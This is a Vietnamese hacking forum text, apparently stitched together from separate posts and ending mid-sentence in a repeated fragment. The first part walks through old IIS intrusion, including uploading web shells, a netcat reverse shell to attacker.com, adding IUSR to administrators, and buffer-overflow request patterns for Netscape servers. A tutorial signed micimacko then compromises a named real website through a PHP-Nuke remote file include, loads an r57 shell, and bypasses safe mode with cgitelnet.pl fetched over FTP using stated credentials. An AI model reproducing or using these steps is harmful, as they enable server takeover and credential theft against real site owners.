C:\winnt\system32\cmd.exe thành một file tên là sensepost.exe trên thư mục chỉ định như tham số web root ( hay nói cho dễ hiểu ở đây chính là c:\inetpub\scripts). Như đã nói nó được đổi tên để tránh sự vô hiệu hoá cmd.exe -> redirect (">") qua khai thác này.Sensepost.exe sau đó sử dụng để echo/redirect file upload.asp và upload.inc lần lượt vào web root directory ( ở đây là \inetpub\scripts). Khi upload.asp và các file cần thiết đã ở trên server thì ta có thể sử dụng web browser để upload nhiều file hơn (xem hình vẽ) user posted image Để có thể đoạt quyền kiểm soát server ,attacker có lẽ sẽ upload 2 file khác ( sử dụng upload.asp script).File đầu tiên có lẽ là netcat.Chỉ một thời gian ngắn sau hacker Maceo viết cmdasp.Nó dựa trên script chạy lệnh sử dụng các khai thác Unicode từ trong web browser của attacker.Cmdasp có một giao diện đồ họa dễ dàng cho việc sử dụng và chạy các lệnh unicode,xem hình vẽ user posted image Chỉ việc đánh vào browser như sau http://victim.com/scripts/upload.asp http://victim.com/scripts/cmdasp.asp Với nc.exe đã upload và khả năng chạy lệnh của cmd.asp cho thấy một shell với hệ thống của attacker là không cần thiết nữa.Hãy bắt đầu lằng nghe bằng netcat trên hệ thống của attacker như sau: C:\>nc -l -p 2002 Sau đó sử dụng cmdasp.asp để tạo ra một netcat shell bằng việc nhập vào lệnh sau vào form và ấn Run: c:\inetpub\scripts\nc.exe -v -e cmd.exe attacker.com 2002 Và giờ đây hãy nhìn vào cửa sổ command của chúng ta,nơi mà đang chạy netcat listener trên cổng 2002 như hình vẽ bạn sẽ thấy 1 shell lệnh được hiện ra.Ở đây đã chạy ipconfig trên remote shell để minh họa rằng máy victim là dual-homed Leo thang đặc quyền trên iis: Một vài khai thác leo thang đặc quyền tồn tại trên windows nt và 2000.Tuy nhiên rất nhiều trong số chúng yêu cầu các shell tương thích để có thể được gọi thành công.Một remote web session không được xem như một session tưong thích của windows,do vậy nên những khai thác này là không khả thi vớ web servic chỉ là có thể vươn tới thông qua một kẻ lừa đảo. Trên iis 4 ,khai thác LPC port ( local procedure call) gọi là hk.exe không yêu cầu trạng thái tương thích,và có thể được khai thác thông qua directory traversal nếu hk.exe có thể được upload lên victim server.Hk sẽ run lệnh như một tài khoản đầy đủ quyền hạn trên window,cho phép kẻ lừa đảo dễ dang thêm tài khoản IURS hoặc là IWA vào nhóm administrator.Đây là lệnh mà intruder sẽ chạy thông qua unicode hoặc double decode: hk net localgroup administrators IUSR_ machinename /add Lỗ hổng này đã được patch trên iis 5 . Việc leo thang đặc quyền trên iis theo như tôi biết thì chủ yếu dựa trên các kĩ thuật gọi là tiêm dll.Chẳng hạn với iis 5,nếu một attacker có thể upload hay là tìm được một ISAPIDLL dung để gọi RevertToSelf API đặt IUSR vào SYSTEM khi chạy nó.Nó hoạt động gần giống với unicodeloader.pl.Có thể khai thác để thoả hiệp hệ thống. HỆ THỐNG SỬ DỤNG NETSCAPE ENTERPRISE SERVER:(NES) Lỗi tràn bộ đệm trên nes 3.6 sp2 và nes fast track server 2.0.1.Với khoảng 4080 kí tự trở nên và shellcode: GET /[ buffer][ shellcode] HTTP/1.0 Lệnh trong shellcode sẽ chạy như localsystem trên windows. Lỗi tràn bộ đệm thứ 2 được khai thác bởi việc gửi một yêu cầu getproperties với buffer và shell code thích hợp. GETPROPERTIES /[buffer] HTTP/1.0[shellcode] Shell code này sẽ chạy trong ngữ cảnh system.Áp dụng trên nes enterprise server vs3.6 với sp7. Khắc phục:năng cấp bản vá lỗi tại http://enterprise.netscape.com hay tại http://wwws.sun.com/software/download/ Novell GroupWise Arbitrary File Access Một ví dụ điển hình về serlet không an toàn,lỗ hổng này có thể có từ window2000 tới novel.Xem ví dụ sau: http://victim.com/servlet/webacc?Use /webacc.cfg%00 unixzdo(HCE) 1 Phương Pháp ByPass Safe-Mode Lần trước có làm 1 cái video về cái này, nhưng nó hơi nặng , thôi hôm nay vít thành 1 Tút cho anh em dễ đọc hem +Site victim của tôi là : http://tusivachungsinh.net/ Nhìn vào ta sẽ thấy nó xài Php-Nuke, mà thằng này thì dính đầy lỗi Critical . Ta check 1 lỗi phổ biến của nó để include shell xem Lỗi này đã đc public khá lâu rồi,nhưng nhiều thằng ko chịu Update thì ta vẫn mần ăn đc hehe vô milw0rm : http://milw0rm.com/exploits/1866 ( Bug PHP-Nuke <= All version - Remote File Include Vulnerabilities ) Qua lỗi này tôi get đc 1 con shell lên Host qua đường Link Trích: hxxp://tusivachungsinh.nt/modules/Forums/admin/admin_avatar.php?phpbb_root_ path=hxxp://sheva7ac.googlepages.com/r57shell.txt? Okies ! Đây là thông tin mà con r57 đem lại Trích: Linux hk2.vn-sg.com 2.4.21-40.ELsmp #1 SMP Wed Mar 15 14:44:44 EST 2006 i686 - Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8 uid=32135 ( tusiva ) gid=32136 ( tusiva ) /home/tusiva/public_html/modules/Forums/admin/ Và thêm nữa là thằng này nó bật Safe-Mode, dis khá nhiều các hàm quan trọng Trích: safe_mode: ON Disable functions : show_source,dl,exec,shell_exec,system,popen,pclose ,proc_open,proc_close,passthru,virtual,leak,chgrp, ini_alter,ini_restore Command lệnh của con shell vì thế ko hiện đc luôn Nhưng nhìn kĩ lại ta thấy uid=tusiva , vậy thì mặc mẹ nó ta có quyền owner của site này roài Ta đã biết Safe-Mode bật và disable hết các hàm PHP chạy shell của ta, nhưng với các Script khác thì nó vô dụng Vì thế tôi sẽ get 1 con shell dùng perl script lên server này , con mà anh em hay dùng là cgitelnet.pl (ngoài ra nghe nói còn có con shell ".cgi" nữa , chắc dùng vào đây cũng đc anh em ai có thì share nhé) ý tưởng là như vậy +Đầu tiên tạo 1 thư mục riêng để làm việc cho sướng, mặc dù Safemode On nhưng các hàm bình thường của PHP vẫn chạy đc như thường (nếu nó dis hết thì có mà bán Host cho ma nó mua ) Trên con r57 ta gõ vào ô Eval PHP code : Trích: mkdir("./new", 0755); ấn Excute , sau đó quay trở lại ta đã thấy trong thư mục /home/tusiva/public_html/modules/Forums/admin/ đã xuất hiện thêm 1 thư mục con "new" nữa với chmod là 755 roài (thư mục admin chmod thế nào cũng ko quan trọng vì mình đã có quyền owner của nó rồi) Chuyển đến thư mục /home/tusiva/public_html/modules/Forums/admin/new để làm việc , Oke ! Tiếp theo là công đoạn Get con cgitelnet.pl lên Host, vào phần "Download files from remote ftp-server" trên con r57 ta điền vào thông tin của Host FTP có chứa con cgitelnet của ta Trích: FTP-server: netfast.org Login: micimacko Password: 123456 File on ftp: /wwwroot/cgitelnet.pl Local file: /home/tusiva/public_html/modules/Forums/admin/new Transfer mode: ASCII rồi ấn Download để Transfer nó về Host Quay lại thư mục new ta thấy có con cgitelnet.pl rồi , nó đang mặc định chmod là 644 Ta phải chmod lại cho nó thành 755, chạy PHPcode như sau: Trích: chmod("./cgitelnet.pl",0755); Okies , đã xong ! Giờ ta vào Link hxxp://tusivachungsinh.nt/modules/Forums/admin/new/cgitelnet.pl đã thấy màn hình đen đen bí hiểm của con cgitelnet hehe, như vậy là ta đã có 1 command shell trên sv với uid=tusiva , bất chấp sv đang bật Safe-Mode ++Lưu ý: con cgitelnet.pl chỉ chạy đc với các đk sau: -Get về Host với dạng ASCII -chmod 755, thư mục chứa nó cũng phải có chmod 755 (thường ng ta Get về cgi- bin, nhưng thực ra ở đâu có 755 là đc) -có 2 cái quan trọng nhất nữa là : uid=owner & sv hỗ trợ Perl ++Với con cgitelnet này có thể change File .contactemail để forgot pass lấy cPanel hay là cat /etc/passwd để xem File passwd End! Chúc thành công .:micimacko -HcE:. Ẩn backdoor phòng khi cần đến . file khác ( sử dụng upload.asp script).File đầu tiên có lẽ là netcat.Chỉ một thời gian ngắn sau hacker Maceo viết cmdasp.Nó dựa trên script chạy lệnh sử dụng các khai thác Unicode từ trong web